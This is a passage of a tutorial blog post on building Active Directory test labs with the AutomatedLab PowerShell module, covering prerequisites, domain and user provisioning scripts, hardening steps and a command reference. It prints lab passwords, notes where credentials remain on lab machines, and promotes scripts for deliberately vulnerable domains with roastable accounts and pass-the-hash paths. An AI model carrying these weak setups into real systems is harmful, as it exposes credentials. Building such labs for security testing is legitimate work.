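    $alVersion = if ($al) { $al.Version.ToString() } else { 'not installed' }

    $issues = @()
    if ($totalGB -lt $MinimumMemoryGB) {
        $issues += "Only $totalGB GB RAM; at least $MinimumMemoryGB GB is needed for a DC plus a client"
    }
    if (-not $hyperV -or $hyperV.State -ne 'Enabled') {
        $issues += 'Hyper-V is not enabled: Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V-All'
    }
    elseif (-not $cs.HypervisorPresent) {
        # Feature is on but no hypervisor booted: usually VT-x/AMD-V is off in firmware
        $issues += 'Hyper-V is enabled but no hypervisor is running; check VT-x/AMD-V in the BIOS/UEFI'
    }
    if ($build -lt 19041) {
        $issues += "Build $build is older than Windows 10 2004 (19041): VMware Workstation cannot run alongside Hyper-V"
    }
    if ($policy -in 'Restricted', 'AllSigned') {
        $issues += "Execution policy '$policy' will block unsigned local scripts such as your lab .ps1 files"
    }
    if (-not $al) {
        $issues += 'AutomatedLab module is not installed: Install-Module AutomatedLab -AllowClobber'
    }

    [pscustomobject]@{
        MemoryGB         = $totalGB
        HyperVEnabled    = ($null -ne $hyperV -and $hyperV.State -eq 'Enabled')
        HypervisorActive = [bool]$cs.HypervisorPresent
        OSBuild          = $build
        ExecutionPolicy  = $policy
        AutomatedLab     = $alVersion
        Issues           = $issues
    }
}

# Narrower alternative to 'Set-ExecutionPolicy Unrestricted': RemoteSigned runs
# local scripts (your lab .ps1 files, also from PowerShell ISE) but still
# requires a signature on scripts carrying the internet zone marker, and
# CurrentUser scope needs no elevation and leaves other accounts untouched.
function Set-ALExecutionPolicy {
    Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
}

Test-ALHostPrerequisites | Format-List
```

An empty Issues list means the host matches the requirements in this section; each entry otherwise names the command or setting to fix, so the output doubles as a checklist.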

Telemetry opt-in on first run

When you execute it for the first time, you will be asked the following questions.

Opt in to telemetry?

Whether to send diagnostic information. Please choose either Yes or No.

Download ISO file

AL can use an ISO image only if it contains a Windows image file named install.wim. ISO files such as Windows 10 Pro downloaded with the Windows Media Creation Tool do not contain a .wim file and cannot be used as is. The evaluation ISOs include install.wim, so use those for verification purposes.

The trial version ISO file for each OS is as follows.

Windows Server 2019
https://www.microsoft.com/ja-jp/evalcenter/evaluate-windows-server-2019
Windows 10 Enterprise
https://www.microsoft.com/ja-jp/evalcenter/evaluate-windows-10-enterprise

Prepare the English (US) version of each. Either architecture works, but we use x64 here.
* You need to enter your name, company name and phone number to download the ISO files.

After downloading the ISO file, place it in the ISOs folder inside the AL LabSources folder.
The LabSources folder is created directly under the C drive by default.

After copying the ISO, run Get-LabAvailableOperatingSystem in PowerShell to make sure the image is recognized:

PS C:\WINDOWS\system32> Get-LabAvailableOperatingSystem |ft OperatingSystemImageName
20:30:25|00:48:57|00:48:57.052| Scanning 2 files for operating systems
Found 5 OS images.
OperatingSystemImageName
------------------------
Windows 10 Enterprise Evaluation
Windows Server 2019 Standard Evaluation
Windows Server 2019 Standard Evaluation (Desktop Experience)
Windows Server 2019 Datacenter Evaluation
Windows Server 2019 Datacenter Evaluation (Desktop Experience)

This completes the basic setup.

Let’s create our lab

Time required: 10-20 minutes (depending on machine specifications)

Sample scripts exist in LabSources, so you can understand the general method by looking at them.
The tutorials on the GitHub wiki can also help:
https://github.com/AutomatedLab/AutomatedLab/wiki

In addition, extensive documentation can be found at the following URL. However, it does not seem to be up to date, so be careful.
(For the latest information, you can only use Get-Help or read the code in the repository.)
https://automatedlab.org/en/latest/

Let's install Windows Server 2019.
First, run Windows PowerShell with administrator privileges.
Next, copy the following commands into a text editor and save them as a .ps1 file.

# Declaration to create a lab called TestLab
# Everything you set from now on is applied by executing the "Install-Lab" command
# Default virtualization engine is Hyper-V. This is a required option.
New-LabDefinition -Name TestLab -DefaultVirtualizationEngine HyperV


## Create a machine for Windows Server 2019
# PowerShell can split a long command over multiple lines by putting a backtick (`) at the end of each line.
# -OperatingSystem: use the OperatingSystemImageName shown by Get-LabAvailableOperatingSystem
Add-LabMachineDefinition `
    -Name ws2019 `
    -Memory 2GB `
    -OperatingSystem 'Windows Server 2019 Standard Evaluation (Desktop Experience)'

# Apply and create lab settings
Install-Lab

# Show deployment results
Show-LabDeploymentSummary -Detailed

The edition is the same for both Standard and Datacenter as long as it is the evaluation version. If you want to use it commercially, it is best to choose the Datacenter option in case you later purchase a license.

Execute the script.

Once executed, the lab will start building.

Since the base image is created for each OS, it will take some time for the first time. The second and subsequent times are much faster.

After a while, the process will complete and you will see the Show-LabDeploymentSummary results.

If the account name and password are not specified when defining the machine, the defaults are used.
As shown in the summary, the administrator account is "Administrator" and the password is "Somepass1" by default.
The network settings are similar: by default a network with the subnet 192.168.1.0/24 is created, chosen to avoid conflicts with the host's networks in the 192.168.0.0/16 range.
The machine is not connected to the Internet with these settings, but you can connect to it and do a lot of things.

Connect to the lab machine

Type the following commands at the shell prompt at the bottom of PowerShell ISE. You may want to close the Commands pane on the right side of the screen, as it can steal keyboard input.

RDP connection

You can use the Connect-LabVM command to make an RDP connection.

> Connect-LabVM ws2019

Enter "Administrator" as the user name and "Somepass1" as the password.

You can also use "Remote Desktop Connection" (mstsc) directly from the command line:

> mstsc /v:ws2019

Establish a PowerShell session with the lab machine

The lab machine has WinRM enabled by default, so PSSession is available.
By using Enter-LabPSSession, AL will use your credentials to establish the session.

> Enter-LabPSSession ws2019

[ws2019]: PS C:\Users\Administrator\Documents> whoami
ws2019\administrator

Have your lab machine run PowerShell cmdlets

Let's make sure that Invoke-LabCommand can execute arbitrary code.

> Invoke-LabCommand -ComputerName ws2019 -ScriptBlock {Write-Host (whoami)}
19:21:19|00:03:09|00:00:00.000| Executing lab command activity: '<unnamed>' on machines 'ws2019'
19:21:19|00:03:09|00:00:00.009| - Waiting for completion
ws2019\administrator
19:21:29|00:03:19|00:00:10.159| - Activity done

Invoke-LabCommand takes a lab machine and a ScriptBlock and executes arbitrary PowerShell code and OS commands on it. Here, the output of the whoami command is written to standard output with the Write-Host cmdlet.
It is not very useful at this point, but it is often used for post-processing after the lab installation.

Create a domain environment

Time required: 30-40 minutes

Next, based on "04 Single domain-joined server.ps1" in the Introduction folder of SampleScripts, create a script that installs Windows Server 2019 and sets up a domain environment. This time we set the domain administrator password with Add-LabDomainDefinition.

Paste the following script into PowerShell ISE and run it. Or paste it into a text editor, save it as filename.ps1, then run it from PowerShell.
* It looks long, but most of it is comments (tips).

# Delete if Lab already exists 
# Machine namespace is common to all labs, so be careful not to duplicate if you create while keeping the existing lab. 
Remove-Lab

# Declaration to create a lab called TestDomainLab 
#Everything you set from now on is applied by executing the "Install-Lab" command 
# Default Virtualization Engine is Hyper-V. This is a required option. 
New-LabDefinition -Name TestDomainLab -DefaultVirtualizationEngine HyperV

#Since DomainName is used on multiple machines, make it a variable. 
$TestDomain = 'al.corp' 

## Domain admin user information. 
$DomainAdminUser = "aladmin" 
$DomainAdminPassword = "[email protected]!"

## Set the user account used during OS installation for lab construction (local user).
# Set-LabInstallationCredential is common within the lab. It can be overridden along the way.
# For domain controllers, Set-LabInstallationCredential and Add-LabDomainDefinition must use the same information.
# However, if you do so, machines other than the DC get a local administrator account with the same credentials as the domain administrator.
# Therefore, when building a proper lab, it is better to specify a separate local user for kitting on non-DC machines
# with the -InstallationUserCredential option of Add-LabMachineDefinition.
Set-LabInstallationCredential -Username $DomainAdminUser -Password $DomainAdminPassword

#Set domain administrator account 
Add-LabDomainDefinition -Name $TestDomain -AdminUser $DomainAdminUser -AdminPassword $DomainAdminPassword

## Create a domain controller
# PowerShell can split a long command over multiple lines by putting a backtick (`) at the end of each line.
# -Roles: specifies the role of the machine. Various settings are required for a DC or SQL Server, but AL
#   predefines most of them in the form of a Role.
# A single or forest-root domain controller uses the RootDC role.
# See the About Roles section of the documentation for the list of roles.
# -DomainName: the domain name. This time it is named after AutomatedLab. Machines that should belong to the same domain get the same DomainName.
# This OS is not the Desktop Experience edition. This is recommended if you want a lighter installation.

Add-LabMachineDefinition `
-Name DC1 `
-Memory 2GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain


## Create the Windows 10 client machine (in fact, setup is faster if the client is also WS2019)
Add-LabMachineDefinition -Name Client1 -Memory 2GB -OperatingSystem 'Windows 10 Enterprise Evaluation' -DomainName $TestDomain


#Apply and create lab settings 
Install-Lab

# Show deployment results 
Show-LabDeploymentSummary -Detailed

As you can see in the comments, the Install-Lab command starts the build. You can change the configuration as much as you want before that point.
If possible, it is more time-efficient to refine the configuration first and add Install-Lab at the end, rather than repeating a time-consuming deployment each time. There are many things you won't understand until you try them, so build and scrap freely until you get used to it.

As a result, it took about 30 minutes.

As I wrote in the script comments, because of Set-LabInstallationCredential, Client1 has a local administrator with the same credentials as the domain administrator account.
To avoid this, specify a separate local administrator account for kitting via the Add-LabMachineDefinition option.

The client also belongs to the al.corp domain.

Domain Admins also includes the "aladmin" account configured in the build script.

[DC1]: PS C:\Users\aladmin\Documents> net group "Domain Admins" /domain
Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator aladmin                  
The command completed successfully.

It took a while to set up the domain and Windows 10, but it is very easy: define two machines from scratch and wait about 30 minutes over a cup of coffee for the domain to be set up.
Check using the Enter-LabPSSession and Connect-LabVM commands.

What about settings such as user accounts? You script them yourself

Unfortunately, AL only covers the automated setup of the machines themselves.
After building the machines, you write PowerShell for the additional setup such as user accounts, group memberships and group policies.
User accounts can easily be added with the New-ADUser cmdlet on the domain controller.

Post Installation Activity

AL has a “PostInstallationActivity” function that automatically executes a script in the virtual machine after building the virtual machine . PostInstallationActivity can be described in the definition options for each machine. Create a TestLab folder in C:\LabSources\PostInstallationActivities and save the following script as PrepareDomain.ps1 in the TestLab folder.

Start-Transcript C:\Windows\Temp\postinstall.log -append

$users = @()
$users += @{Name = "abe"; Password = "[email protected]"}
$users += @{Name = "iijima"; Password = "[email protected]"}
$users += @{Name = "usui"; Password = "[email protected]"}

ForEach ($user in $users){
   $securePassword = $user.Password | ConvertTo-SecureString -AsPlainText -Force
   New-ADUser -Name $user.Name `
             -AccountPassword $securePassword `
             -PasswordNeverExpires $true `
             -Enabled $true 
}

Write-Output "Useradd done."

Stop-Transcript

As you can see, this script puts user names and passwords in an array and creates each one with New-ADUser in turn.

I manage users, groups and OUs with CSV files for each domain.

By default the password complexity requirement is enabled, so if you want to set weak passwords you need to change the group policy.
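
Going one step beyond the user-only script above, the following PostInstallationActivity builds OUs, groups and users from CSV rows and is an added example, not from the original post. The rows are constructed inline so the script runs as-is on a freshly built DC; in practice you would keep them as .csv files in the DependencyFolder and load them with Import-Csv. The OU, group and user names are made up, and the passwords satisfy the default complexity policy mentioned above.

```powershell
# Added example (not from the original post): PostInstallationActivity that
# populates the lab domain from CSV data. Sample rows are constructed inline;
# names and passwords are made up for the example.

Start-Transcript C:\Windows\Temp\postinstall-directory.log -Append

Import-Module ActiveDirectory
$domain   = Get-ADDomain
$domainDn = $domain.DistinguishedName   # e.g. DC=al,DC=corp

# ParentPath / OU columns are relative to the domain root so the CSV stays domain-agnostic.
$ous = @'
Name,ParentPath
Staff,
IT,OU=Staff
Sales,OU=Staff
'@ | ConvertFrom-Csv

$groups = @'
Name,OU,Scope
IT-Admins,OU=IT,Global
Sales-Users,OU=Sales,Global
'@ | ConvertFrom-Csv

$users = @'
Name,OU,Password,Groups
abe,OU=IT,Lab-P@ssw0rd-01,IT-Admins
iijima,OU=Sales,Lab-P@ssw0rd-02,Sales-Users
usui,OU=Sales,Lab-P@ssw0rd-03,"Sales-Users;IT-Admins"
'@ | ConvertFrom-Csv

function Resolve-LabPath([string]$relative) {
    if ([string]::IsNullOrWhiteSpace($relative)) { $domainDn } else { "$relative,$domainDn" }
}

# OUs first; the CSV lists parents before children
foreach ($ou in $ous) {
    $parent = Resolve-LabPath $ou.ParentPath
    $dn = "OU=$($ou.Name),$parent"
    if (-not (Get-ADOrganizationalUnit -Filter "distinguishedName -eq '$dn'")) {
        New-ADOrganizationalUnit -Name $ou.Name -Path $parent -ProtectedFromAccidentalDeletion $false
        Write-Output "Created OU $dn"
    }
}

foreach ($g in $groups) {
    if (-not (Get-ADGroup -Filter "sAMAccountName -eq '$($g.Name)'")) {
        New-ADGroup -Name $g.Name -GroupScope $g.Scope -GroupCategory Security -Path (Resolve-LabPath $g.OU)
        Write-Output "Created group $($g.Name)"
    }
}

foreach ($u in $users) {
    if (-not (Get-ADUser -Filter "sAMAccountName -eq '$($u.Name)'")) {
        $secure = ConvertTo-SecureString $u.Password -AsPlainText -Force
        New-ADUser -Name $u.Name -SamAccountName $u.Name `
                   -UserPrincipalName "$($u.Name)@$($domain.DNSRoot)" `
                   -Path (Resolve-LabPath $u.OU) -AccountPassword $secure `
                   -Enabled $true -PasswordNeverExpires $true
        Write-Output "Created user $($u.Name)"
    }
    # Membership is checked first so the script can be re-run without errors
    foreach ($groupName in ($u.Groups -split ';' | Where-Object { $_ })) {
        $already = Get-ADGroupMember -Identity $groupName | Where-Object SamAccountName -eq $u.Name
        if (-not $already) {
            Add-ADGroupMember -Identity $groupName -Members $u.Name
            Write-Output "Added $($u.Name) to $groupName"
        }
    }
}

Write-Output "Directory population done."
Stop-Transcript
```

Every step checks for the object before creating it, so the activity is safe to run again after a partial failure, and the transcript in C:\Windows\Temp shows exactly which objects were created on this run.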

Next, add the PostInstallationActivity option to the domain controller in the build script above .

$postInstallActivity = Get-LabPostInstallationActivity `
                   -ScriptFileName PrepareDomain.ps1 `
                   -DependencyFolder "C:\LabSources\PostInstallationActivities\TestLab"

# Domain Controller
Add-LabMachineDefinition `
-Name DC1 `
-Memory 1GB `
-OperatingSystem 'Windows Server 2019 Standard Evaluation' `
-Roles RootDC `
-DomainName $TestDomain `
-PostInstallationActivity $postInstallActivity

In the $postInstallActivity variable, declare the location of the folder of the script as an option of the Get-LabPostInstallationActivity cmdlet, and build the lab again.

After installation, you can confirm that the user is properly created as shown below.

Precautions after lab creation

In my build, I identified the following security concerns in the default state. If you want to build a CTF-like environment and hand it to others, deal with these in advance:

  • C:\Unattend.xml contains the credentials of the kitting user
  • AutoLogon is enabled by default, with the password stored in HKLM\SECURITY\Policy\Secrets\DefaultPassword
  • The local administrator used for kitting is left enabled
  • WinRM is enabled
  • UAC is disabled
  • Windows Firewall is disabled
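
A PostInstallationActivity that cleans up those leftovers before a lab is handed to others is given below as an added example; it is not from the original post. The registry locations are the standard Winlogon and UAC policy keys, the unattend paths are C:\Unattend.xml from the list above plus the usual Windows Setup copies, and WinRM is deliberately left on because Invoke-LabCommand and Enter-LabPSSession depend on it.

```powershell
# Added example (not from the original post): PostInstallationActivity that
# removes the default-state leftovers listed above from a lab VM.

Start-Transcript C:\Windows\Temp\harden.log -Append

# 1. Unattend files carry the kitting user's password in clear text.
#    C:\Unattend.xml is the path named above; the others are where Windows
#    Setup keeps its own copies.
$unattendPaths = 'C:\Unattend.xml',
                 "$env:SystemRoot\Panther\Unattend.xml",
                 "$env:SystemRoot\Panther\Unattend\Unattend.xml",
                 "$env:SystemRoot\System32\Sysprep\Unattend.xml"
foreach ($p in $unattendPaths) {
    if (Test-Path -LiteralPath $p) {
        Remove-Item -LiteralPath $p -Force
        Write-Output "Removed $p"
    }
}

# 2. AutoLogon: switch it off and drop the clear-text Winlogon values.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
Set-ItemProperty -Path $winlogon -Name AutoAdminLogon -Value '0'
foreach ($n in 'DefaultPassword', 'AutoLogonCount') {
    Remove-ItemProperty -Path $winlogon -Name $n -ErrorAction SilentlyContinue
}
# The LSA secret HKLM\SECURITY\Policy\Secrets\DefaultPassword is not touched
# here: clearing it needs LsaStorePrivateData (what the Sysinternals Autologon
# tool's Disable button does), so rotate the kitting password as well.

# 3. UAC back on (takes effect at the next logon).
Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' `
                 -Name EnableLUA -Value 1 -Type DWord

# 4. Windows Firewall on for all profiles; keep WinRM and RDP reachable from
#    the host so Invoke-LabCommand, Enter-LabPSSession and Connect-LabVM work.
Set-NetFirewallProfile -Profile Domain, Private, Public -Enabled True
Enable-NetFirewallRule -DisplayGroup 'Windows Remote Management'
Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'

# 5. Built-in local Administrator (RID 500): disable it on domain members,
#    where Set-LabInstallationCredential left it with the domain admin
#    password. Skipped on a DC (ProductType 2), which has no local accounts.
$isDc = (Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 2
if (-not $isDc) {
    Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' } | Disable-LocalUser
    Write-Output 'Disabled built-in local Administrator'
}

Stop-Transcript
```

Attach it with Get-LabPostInstallationActivity exactly as PrepareDomain.ps1 is attached above, ordered after any activity that still relies on the AutoLogon session, and re-run Show-LabDeploymentSummary afterwards to confirm the administrator password printed there is no longer the one in use.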

What do you think?

I would be more than happy to share the joy of building scripts for automating AD labs.
I enjoyed the automation and wrote a lot of build scripts and PostInstallationActivity scripts to create a vulnerable environment like the one below, which can be set up fully automatically in 2 hours.

Build scripts: https://gist.github.com/jimmwayans/daa86a8260aa74351206ef55769cb772

You can create two forests, connect MSSQL database links, add Kerberoastable or AS-REP-roastable accounts, or RDP with pass-the-hash to a Restricted Admin machine; complex environments like these can be created with AutomatedLab (and lots of PowerShell).
It was difficult but interesting to arrange things so that an NTLM hash always remains on a specific machine.

There are other ways to connect the virtual machines to the Internet, but that would be long, so I will omit it here. Check the SampleScripts folder for examples.
I enjoy validating C2 frameworks by putting Squid on my router machine so that the lab can only reach the Internet via a proxy.

Finally, I will end with a collection of frequently used AL commands.

Frequently used commands

All help can be found in Read the Docs below.
https://automatedlab.org/en/latest/
Here are some frequently used commands.

Whole lab

View list of labs

Get-Lab -List 

View a list of already installed labs.
Any listed lab can be loaded into the session with the Import-Lab command.

Lab session restoration
Import-Lab [Lab name]

Restores the session of an installed lab. Required to operate the lab again after the PowerShell window used to build it has been closed. The lab information is imported into the PowerShell session, allowing you to stop and start machines, get information, connect, and take snapshots.

List of lab machines
Get-LabVM

View lab machine information.

Obtaining detailed information during lab installation
Show-LabDeploymentSummary -Detailed

Display all machine names and network information, including the administrator user password at the time of installation.

Lab removal
Remove-Lab

Lab machines, network adapters, etc. are all deleted.

Stop and start the machine

Suspend (save state)
Save-LabVM [-Name <computer name> | -All]

The argument is the computer name; “-All” applies to all lab machines.
The machine state, including memory, is saved. On start, the machine resumes where it left off.

Stop
Stop-LabVM [-Name <computer name> | -All]

The argument is the computer name; “-All” applies to all lab machines.
A shutdown signal is sent to the guest.

Start
Start-LabVM [-Name <computer name> | -All]

The argument is the computer name; “-All” applies to all lab machines.

Snapshot

Take a snapshot
Checkpoint-LabVM [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is the computer name; “-All” applies to all lab machines.

  • Specify the snapshot name with -SnapshotName. Required.
> Checkpoint-LabVM -All -SnapshotName InitialSetup

* If the snapshot (checkpoint) does not appear in either Get-LabVMSnapshot or Hyper-V Manager after running this, creation may have failed due to insufficient free disk space. Try creating the checkpoint from Hyper-V Manager and check the error it reports.

Checking the snapshot
Get-LabVMSnapshot [-ComputerName <computer name>]

If nothing is specified, information on all lab machines will be displayed.

> Get-LabVMSnapshot

SnapshotName CreationTime       ComputerName
------------ ------------       ------------
InitialSetup 2020/08/21 0:04:06 ws2016      
second       2020/08/21 0:05:55 ws2016

Restore snapshot
Restore-LabVMSnapshot [-ComputerName <computer name> | -All] -SnapshotName <snapshot name>

The argument is the computer name; “-All” applies to all lab machines.

  • Specify the snapshot name with -SnapshotName. Required.
> Restore-LabVMSnapshot -All -SnapshotName InitialSetup

Machine connection

Establish a Powershell session with a lab machine
Enter-LabPSSession -ComputerName <computer name>

A PowerShell session is established over PSRemoting. If the lab machine is domain-joined, the credentials of the domain admin kitting user created when the lab was built are used; otherwise, the local kitting user’s credentials are used.

RDP connection to lab machine
Connect-LabVM -ComputerName <computer name>

You can also use the standard Windows Remote Desktop Client (mstsc).

mstsc /v:<computer name>

Others

Establish a PSRemoting session with any credentials
$sess = New-LabPSSession -ComputerName <computer name> -Credential <PSCredential>

You can establish a PS session with any credentials. This is useful if you change the domain administrator password after installing the lab: AutomatedLab cannot detect a password changed after installation, so the standard cmdlets fail to log in.

Using the returned PSSession object, you can enter a PS session on the lab machine as follows (the -Session parameter identifies the target machine, so -ComputerName is not combined with it).

Enter-PSSession -Session $sess

File transfer (host -> lab machine)
Copy-LabFileItem -ComputerName <Computer name> -Path <Host computer source file / directory> -DestinationFolderPath <Lab machine destination folder>

Transfers files from the host computer to the lab machine.
The administrator credentials from the time of lab construction are used. All copied files and folders are placed with the read-only attribute set.

File transfer 2 (host -> lab machine)
Send-File -SourceFilePath <Source file on host computer> -DestinationFolderPath <Destination folder on lab machine> -Session <PSSession>

Send-Directory -SourceFolderPath <Host computer source directory> -DestinationFolderPath <Lab machine destination folder> -Session <PSSession>

Sends files to the lab machine using any PSSession. Useful if you have changed the domain administrator password after installing the lab.

File transfer (lab machine -> host)
Receive-File -SourceFilePath <Lab source file> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receive-Directory -SourceFolderPath <Lab source directory> -DestinationFolderPath <Host computer destination folder> -Session <PSSession>

Receives files from the lab machine using any PSSession. Useful if you have changed the domain administrator password after installing the lab.

ーーー

I haven’t written enough yet, but I believe that if I write this far, some people will find it useful.
Let’s make your AD verification life easier with AutomatedLab!

My PowerShell scripts for AL: @jimmwayans

Follow me on twitter for more infosec resources: @jimmwayans
